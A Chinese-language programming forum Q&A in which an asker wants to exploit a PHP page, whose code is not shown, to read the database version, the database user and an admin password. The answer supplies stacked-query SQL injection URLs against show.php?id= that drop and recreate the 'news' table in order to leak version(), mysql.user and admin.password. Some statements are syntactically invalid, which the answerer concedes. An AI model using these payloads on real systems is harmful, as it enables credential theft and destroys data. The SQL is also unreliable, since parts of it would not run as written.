php - 關於sql注入的問題

Question

有這樣一段php程式碼

請問最後如何透過利用腳本查詢資料庫版本，資料庫用戶，和欄位為1的password內容

Answer 1

你意會吧，如果是我的話我可能會試試看這麼做。 。 。
sql注入只了解一些簡單的原理來著。 。 。
sql語法我都忘光了。 。 。文法不對的部分你自己查一下文法改下吧。 。 。

# 获得数据库版本
show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1);
show.php?id=1

# 获取数据库用户
show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news;
show.php?id=1

# 获取表admin ID为1字段password的内容
show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news;
show.php?id=1

額對了。 。一般還是別做得這麼絕。 。 。
rename一下原來的news，所有的資訊都查完之後把沒用的news刪掉再rename回去吧。 。 。但是rename語句我忘了。 。 。